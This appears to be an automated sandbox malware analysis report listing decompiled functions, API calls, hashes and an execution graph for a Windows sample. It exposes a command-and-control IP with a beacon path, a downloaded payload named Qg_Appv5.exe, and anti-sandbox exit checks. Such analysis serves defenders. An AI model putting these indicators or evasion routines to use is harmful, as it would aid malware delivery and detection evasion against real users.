                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Getfacet$H_prolog3InitSetgloballocaleYarn
                                                                                                                                                                                                                                                                                        • String ID: wB
                                                                                                                                                                                                                                                                                        • API String ID: 3898505750-480074513
                                                                                                                                                                                                                                                                                        • Opcode ID: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                                                                        • Instruction ID: edbdd7ebb8c5171918d03f37272a9e124c092f2c869cbbc06f3c8555867fd0d2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C21B071A21215DFE718EF68C840BA9B7F5FF88314F20C15ED8059B2C2DB70A905CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                                                                                        • String ID: -@
                                                                                                                                                                                                                                                                                        • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                                                                                        • Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                                                                        • Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004034E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                                                                        • Opcode ID: 6ce4b3f3f3a476027b50502c85f5921e8b78a39e23d084b56ba9ef5ace9e0aba
                                                                                                                                                                                                                                                                                        • Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ce4b3f3f3a476027b50502c85f5921e8b78a39e23d084b56ba9ef5ace9e0aba
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420374A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                                                                        • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                                                                        • Instruction ID: 58cad69bb64099602b8576d1189b9b62e2cba9be08d4292d9ac7a8c444cb5c6d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D11C272710115BBE7059F98CC40AAEB7B9FF49714F008129F804E7292D371AA5087A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                                        • String ID: T*@
                                                                                                                                                                                                                                                                                        • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                                                                                        • Opcode ID: d0f7d386ae4efe2390fbf90dfbd3daa7514f827ed2e8e8cb20172591b6377ab5
                                                                                                                                                                                                                                                                                        • Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0f7d386ae4efe2390fbf90dfbd3daa7514f827ed2e8e8cb20172591b6377ab5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                                                                                        • String ID: u@@
                                                                                                                                                                                                                                                                                        • API String ID: 206117190-736001340
                                                                                                                                                                                                                                                                                        • Opcode ID: 457c0db2275d5d41219090803dc9521f21b1157a3f189203d6fa5eb114c840f9
                                                                                                                                                                                                                                                                                        • Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 457c0db2275d5d41219090803dc9521f21b1157a3f189203d6fa5eb114c840f9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04201A6D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: [vB$ios_base::failbit set
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-2429468811
                                                                                                                                                                                                                                                                                        • Opcode ID: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
                                                                                                                                                                                                                                                                                        • Instruction ID: ab704284c91e3e138bf687fc79a9779b2e9cfaa6e32b5170fe2e18da97776256
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA01B172610109DFDB04DF58C444BFDBBF8EF49318F14815AE401A7251D7B56E45CBA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0042631A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PathTemp
                                                                                                                                                                                                                                                                                        • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                                                                        • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                                                                        • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                                                                        • Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04226581 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,04225DF5,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0422658B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PathTemp
                                                                                                                                                                                                                                                                                        • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                                                                        • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                                                                        • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                                                                        • Instruction ID: 911cbcbcfc080ed27fe2f6512a62b5be9599a0ebcd8a2bf74d7d4680efd8aa5b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFE07D133048131A5F3D0C2A3C19ABBDF03DFC7550348C2AAD88307249CD412C0BD2B0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041A7FD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                                                                        • Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421AA64 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0421AAFA
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0421AB08
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0421AB63
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
                                                                                                                                                                                                                                                                                        • Instruction ID: 697364eadc88d5f5a797056cb768f62e68fc4e868a0050957fb1e5f48be77d47
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C541E830722287AFDB218F64C844F7A7BE6AF31310F154169E959A71F1DB74AA01C750
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:5.6%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                        Signature Coverage:2.4%
                                                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:42
                                                                                                                                                                                                                                                                                        execution_graph 58299 4136b0 58344 402130 58299->58344 58319 4136f0 58485 414400 GetProcessHeap HeapAlloc GetComputerNameA 58319->58485 58323 413724 58324 416fb0 4 API calls 58323->58324 58325 41372b 58324->58325 58326 416fb0 4 API calls 58325->58326 58327 413732 58326->58327 58328 416fb0 4 API calls 58327->58328 58329 413739 58328->58329 58330 416fb0 4 API calls 58329->58330 58331 413740 58330->58331 58495 416ea0 58331->58495 58333 4137cc 58499 4135e0 GetSystemTime 58333->58499 58335 413749 58335->58333 58337 413782 OpenEventA 58335->58337 58339 4137b5 CloseHandle Sleep 58337->58339 58340 413799 58337->58340 58342 4137ca 58339->58342 58343 4137a1 CreateEventA 58340->58343 58342->58335 58343->58333 58645 4043b0 LocalAlloc 58344->58645 58347 4043b0 2 API calls 58348 40215d 58347->58348 58349 4043b0 2 API calls 58348->58349 58350 402176 58349->58350 58351 4043b0 2 API calls 58350->58351 58352 40218f 58351->58352 58353 4043b0 2 API calls 58352->58353 58354 4021a8 58353->58354 58355 4043b0 2 API calls 58354->58355 58356 4021c1 58355->58356 58357 4043b0 2 API calls 58356->58357 58358 4021da 58357->58358 58359 4043b0 2 API calls 58358->58359 58360 4021f3 58359->58360 58361 4043b0 2 API calls 58360->58361 58362 40220c 58361->58362 58363 4043b0 2 API calls 58362->58363 58364 402225 58363->58364 58365 4043b0 2 API calls 58364->58365 58366 40223e 58365->58366 58367 4043b0 2 API calls 58366->58367 58368 402257 58367->58368 58369 4043b0 2 API calls 58368->58369 58370 402270 58369->58370 58371 4043b0 2 API calls 58370->58371 58372 402289 58371->58372 58373 4043b0 2 API calls 58372->58373 58374 4022a2 58373->58374 58375 4043b0 2 API calls 58374->58375 58376 4022bb 58375->58376 58377 4043b0 2 API calls 58376->58377 58378 4022d4 58377->58378 58379 4043b0 2 API calls 58378->58379 58380 4022ed 58379->58380 58381 4043b0 2 API calls 58380->58381 58382 402306 58381->58382 58383 4043b0 2 API calls 58382->58383 58384 40231f 58383->58384 58385 4043b0 2 API calls 58384->58385 58386 402338 58385->58386 58387 4043b0 2 API calls 58386->58387 58388 402351 58387->58388 58389 4043b0 2 API calls 58388->58389 58390 40236a 58389->58390 58391 4043b0 2 API calls 58390->58391 58392 402383 58391->58392 58393 4043b0 2 API calls 58392->58393 58394 40239c 58393->58394 58395 4043b0 2 API calls 58394->58395 58396 4023b5 58395->58396 58397 4043b0 2 API calls 58396->58397 58398 4023ce 58397->58398 58399 4043b0 2 API calls 58398->58399 58400 4023e7 58399->58400 58401 4043b0 2 API calls 58400->58401 58402 402400 58401->58402 58403 4043b0 2 API calls 58402->58403 58404 402419 58403->58404 58405 4043b0 2 API calls 58404->58405 58406 402432 58405->58406 58407 4043b0 2 API calls 58406->58407 58408 40244b 58407->58408 58409 4043b0 2 API calls 58408->58409 58410 402464 58409->58410 58411 4043b0 2 API calls 58410->58411 58412 40247d 58411->58412 58413 4043b0 2 API calls 58412->58413 58414 402496 58413->58414 58415 4043b0 2 API calls 58414->58415 58416 4024af 58415->58416 58417 4043b0 2 API calls 58416->58417 58418 4024c8 58417->58418 58419 4043b0 2 API calls 58418->58419 58420 4024e1 58419->58420 58421 4043b0 2 API calls 58420->58421 58422 4024fa 58421->58422 58423 4043b0 2 API calls 58422->58423 58424 402513 58423->58424 58425 4043b0 2 API calls 58424->58425 58426 40252c 58425->58426 58427 4043b0 2 API calls 58426->58427 58428 402545 58427->58428 58429 4043b0 2 API calls 58428->58429 58430 40255e 58429->58430 58431 415ed0 58430->58431 58649 415dc0 GetPEB 58431->58649 58433 415ed8 58434 416103 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 58433->58434 58435 415eea 58433->58435 58436 416164 GetProcAddress 58434->58436 58437 41617d 58434->58437 58438 415efc 21 API calls 58435->58438 58436->58437 58439 4161b6 58437->58439 58440 416186 GetProcAddress GetProcAddress 58437->58440 58438->58434 58441 4161d8 58439->58441 58442 4161bf GetProcAddress 58439->58442 58440->58439 58443 4161e1 GetProcAddress 58441->58443 58444 4161f9 58441->58444 58442->58441 58443->58444 58445 4136c0 58444->58445 58446 416202 GetProcAddress GetProcAddress 58444->58446 58447 416d40 58445->58447 58446->58445 58448 416d50 58447->58448 58449 4136cd 58448->58449 58450 416d7e lstrcpy 58448->58450 58451 401190 58449->58451 58450->58449 58452 4011a8 58451->58452 58453 4011d7 58452->58453 58454 4011cf ExitProcess 58452->58454 58455 401120 GetSystemInfo 58453->58455 58456 401144 58455->58456 58457 40113c ExitProcess 58455->58457 58458 4010d0 GetCurrentProcess VirtualAllocExNuma 58456->58458 58459 401101 ExitProcess 58458->58459 58460 401109 58458->58460 58650 401060 VirtualAlloc 58460->58650 58463 4011e0 58654 415090 58463->58654 58466 40125a 58469 413430 GetUserDefaultLangID 58466->58469 58467 401209 __aulldiv 58467->58466 58468 401252 ExitProcess 58467->58468 58470 413493 58469->58470 58471 413452 58469->58471 58477 401150 58470->58477 58471->58470 58472 413481 ExitProcess 58471->58472 58473 413463 ExitProcess 58471->58473 58474 413477 ExitProcess 58471->58474 58475 41348b ExitProcess 58471->58475 58476 41346d ExitProcess 58471->58476 58475->58470 58478 414400 3 API calls 58477->58478 58479 40115e 58478->58479 58480 40118c 58479->58480 58656 4143c0 GetProcessHeap HeapAlloc GetUserNameA 58479->58656 58484 4143c0 GetProcessHeap HeapAlloc GetUserNameA 58480->58484 58482 401177 58482->58480 58483 401184 ExitProcess 58482->58483 58484->58319 58486 413703 58485->58486 58487 416fb0 58486->58487 58657 416d10 58487->58657 58489 416fc1 lstrlen 58491 416fe0 58489->58491 58490 417018 58658 416da0 58490->58658 58491->58490 58493 416ffa lstrcpy lstrcat 58491->58493 58493->58490 58494 417024 58494->58323 58496 416ebb 58495->58496 58497 416f0b 58496->58497 58498 416ef9 lstrcpy 58496->58498 58497->58335 58498->58497 58662 4134e0 58499->58662 58501 41364e 58502 413658 sscanf 58501->58502 58691 416e00 58502->58691 58504 41366a SystemTimeToFileTime SystemTimeToFileTime 58505 4136a0 58504->58505 58506 41368e 58504->58506 58508 412bb0 58505->58508 58506->58505 58507 413698 ExitProcess 58506->58507 58509 412bbd 58508->58509 58510 416d40 lstrcpy 58509->58510 58511 412bcb 58510->58511 58693 416e20 lstrlen 58511->58693 58514 416e20 2 API calls 58515 412bed 58514->58515 58516 416e20 2 API calls 58515->58516 58517 412bfa 58516->58517 58518 416e20 2 API calls 58517->58518 58519 412c07 58518->58519 58697 402590 58519->58697 58524 416e20 2 API calls 58525 412cd5 58524->58525 58526 416fb0 4 API calls 58525->58526 58527 412ceb 58526->58527 58528 416ea0 lstrcpy 58527->58528 58529 412cf4 58528->58529 58530 416d40 lstrcpy 58529->58530 58531 412d11 58530->58531 58532 416fb0 4 API calls 58531->58532 58533 412d2a 58532->58533 58534 416ea0 lstrcpy 58533->58534 58535 412d36 58534->58535 58536 416fb0 4 API calls 58535->58536 58537 412d5a 58536->58537 58538 416ea0 lstrcpy 58537->58538 58539 412d66 58538->58539 58540 416d40 lstrcpy 58539->58540 58541 412d8b 58540->58541 59341 4141c0 GetWindowsDirectoryA 58541->59341 58544 416da0 lstrcpy 58545 412da2 58544->58545 59351 404540 58545->59351 58547 412da8 59496 40fae0 58547->59496 58549 412db0 58550 416d40 lstrcpy 58549->58550 58551 412dd3 58550->58551 59514 401500 58551->59514 58555 412de7 59669 40f3b0 58555->59669 58557 412def 58558 416d40 lstrcpy 58557->58558 58559 412e13 58558->58559 58560 401500 lstrcpy 58559->58560 58561 412e21 58560->58561 58562 405610 37 API calls 58561->58562 58563 412e27 58562->58563 59676 40f200 58563->59676 58565 412e2f 58566 401500 lstrcpy 58565->58566 58567 412e40 58566->58567 59686 40fd10 58567->59686 58569 412e45 58570 416d40 lstrcpy 58569->58570 58571 412e5e 58570->58571 60030 404c70 GetProcessHeap RtlAllocateHeap InternetOpenA 58571->60030 58573 412e63 58574 401500 lstrcpy 58573->58574 58575 412ed0 58574->58575 60037 40ef80 58575->60037 58577 412ed5 58578 416d40 lstrcpy 58577->58578 58579 412ef8 58578->58579 58580 401500 lstrcpy 58579->58580 58581 412f06 58580->58581 58646 4043db 58645->58646 58647 4043ec strlen 58646->58647 58648 402144 58646->58648 58647->58646 58648->58347 58649->58433 58651 401082 moneypunct 58650->58651 58652 4010bd 58651->58652 58653 4010a2 VirtualFree 58651->58653 58652->58463 58653->58652 58655 4011f3 GlobalMemoryStatusEx 58654->58655 58655->58467 58656->58482 58657->58489 58659 416dc2 58658->58659 58660 416dec 58659->58660 58661 416dda lstrcpy 58659->58661 58660->58494 58661->58660 58663 416d40 